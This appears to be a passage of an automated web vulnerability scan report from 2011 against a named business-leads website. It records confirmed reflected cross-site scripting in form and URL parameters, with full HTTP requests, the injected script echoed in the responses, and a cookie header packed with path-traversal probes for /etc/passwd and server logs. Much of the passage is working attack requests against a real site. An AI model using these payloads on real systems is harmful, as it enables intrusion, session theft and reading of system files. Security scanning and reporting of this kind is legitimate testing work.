value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="'"--></style></script><script>netsparker(0x000D3E)</script>" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; 
border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td wid..
- /googleMap.html

/googleMap.html CONFIRMED

http://www.insideup.com/googleMap.html?address='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..

Parameters

Parameter Type Value
address GET '"--></style></script><script>alert(0x000EA5)</script>

Request

GET /googleMap.html?address='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000EA5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/js/default.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:37:04 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=2568F74C18693C5BE273D2B34ED9751C; Path=/
Content-Language: en-US
Content-Length: 1218
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<script type="text/javascript"> var map = null; var geocoder = null; function initialize() { if (GBrowserIsCompatible()) { map = new GMap2(document.getElementById("map_canvas")); map.setCenter(new GLatLng(37.4419, -122.1419), 13); geocoder = new GClientGeocoder(); } } function showAddress() { var address=''"--></style></script><script>netsparker(0x000EA5)</script>'; if (geocoder) { geocoder.getLatLng( address, function(point) { if (!point) { //alert(address + " not found"); } else { map.setCenter(point, 13); var marker = new GMarker(point); map.addOverlay(marker); //marker.openInfoWindowHtml(address); } } ); } } </script> <form name="googleform" id="googleform"></form> <div id="map_canvas" style="width: 275px; height: 200px"></div> <img src="/images/spacer.gif" onload="initialize()" onunload="GUnload()" width="0" height="0"/> <img src="/images/spacer.gif" onload="showAddress()" width="0" height="0"/>
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST '"--></style></script><script>alert(0x001151)</script>
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001151)%3c%2fscript%3e&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:02 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=1C9E54BAF0C132BF14DAEFA9D571B851; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; 
padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. 
Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" 
onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a 
href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <style>/* CSS Document */body{ line-height:18px; } #wrapper{ width:878px; margin:0 auto; padding-top:20px; } h11{ font:20px Verdana, Arial, Helvetica, sans-serif; margin:0px; padding:0px; } span.green{ color:#33a415; } h11 span.r{ font-size:14px; } h2{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#4f4f4f; margin:0px; padding:0; } h3{ font:bold 14px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } h4{ font:bold 16px Verdana, Arial, Helvetica, sans-serif; color:#006cff; margin:0px; padding:0px; } .quote{ font:12px Verdana, Arial, Helvetica, sans-serif; line-height:20px; } .contentWrapper{ }/*--BOX BOX BOX--*/ .greyBox{ background:url(../images/box1.jpg) no-repeat left top #eeeeee; margin:15px 0; } .greyBox1{ background:url(../images/box2.jpg) no-repeat right top; } .greyBox2{ background:url(../images/box3.jpg) no-repeat right bottom; } .greyBox3{ background:url(../images/box4.jpg) no-repeat left bottom; padding:10px 15px; } .contactForm td{ padding:5px;}/*--BOX BOX BOX--*/ </style><div id="wrapper"><a class="secondaryAction" href="advertise.html" >Advertise</a> | <a class="secondaryAction" href="howitworks.html"> How It Works </a>|<a class="secondaryAction" style="margin-left:0;text-decoration:none;"><strong> Case Studies</strong> 
</a>|<a href="competitivecomparision.html" class="secondaryAction"> Competitive Comparison </a>|<a href="advertiserFAQs.html" class="secondaryAction"> Advertiser FAQs </a>|<a href="advertiserTerms.html" class="secondaryAction"> Advertiser Terms </a>|<a href="http://insideup.com/blogs/b2bleadgen" class="secondaryAction"> Marketing Blog </a>|<a href="marketingWhitepaper.html" class="secondaryAction"> Marketing Whitepaper </a><div class="contentWrapper"><table border="0" cellspacing="0" cellpadding="0"> <tr> <td scope="row" width="575"> <h11> <span style="font-size:15px;">TeleDirect Call Centers Case Study</span> |<a href="vocalocitycasestudy.html" style="font-size:15px;"> Vocalocity Voice Over IP Case Study</a> </h11> <br/><br/> <h2>The Leader in Call Center Services for Business Joins Forces with InsideUp to Dramatically Increase Sales Leads & Conversions</h2> <div> <div class="greyBox"> <div class="greyBox1"> <div class="greyBox2"> <div class="greyBox3"> <h3>InsideUp Client Overview</h3> TeleDirect Call Centers has been supporting the business community with outstanding call center services for 50 years and has grown into today's advanced, full-service provider of choice. TeleDirect employs more than 100 professional, courteous CSRs who present first-rate impressions for clients, and the firm deploys cutting-edge technology to handle any call volume. The firm has been on the Sacramento Business Journal's "Fastest Growing Companies" list for six consecutive years!</div> </div> </div> </div> </div> <img src="/images/partition_dash_bar.jpg" /> <img src="/images/tldr.jpg" alt="banner" border="0" usemap="#Map" /> <div class="quote"><span class="green">"</span>InsideUp far exceeded our expectations. InsideUp leads were not only qualified and verified..they were either warm or hot to the touch! Plus they were exactly the prospects that hit our sweet spot. 
Thanks to InsideUp, our business has grown significantly<span class="green">"</span> <strong style="color:#0066FF; display:block;">Tom Coshow, CEO TeleDirect</strong></div> <img src="/images/partition_dash_bar.jpg" /></td> <td valign="top" style=" padding-left:18px;"> <div style="padding:10px; background:#87baff; font:11px Verdana, Arial, Helvetica, sans-serif; line-height:18px;"> <form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="teledirectcasestudy"> <input type="hidden" name="parentPage" value="3"> <table class="contactForm" cellpadding="5"> <tr> <td colspan="2" class="head"><span style="color: #000; font-family: Arial,Helvetica,sans-serif; font-size: 17px; font-weight: bold; line-height:20px;">To get more information about becoming a marketing partner of InsideUp, complete and submit the form below:</span></td> </tr> <tr> <td width="108" style="width: 100px;">First Name</td> <td width="144" style="text-align: left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="'"--></style></script><script>netsparker(0x001151)</script>"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td align="left" valign="top"&g..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST '"--></style></script><script>alert(0x001172)</script>
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001172)%3c%2fscript%3e&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:10 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=07881089287ED8B1DB37E22ABC62E646; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
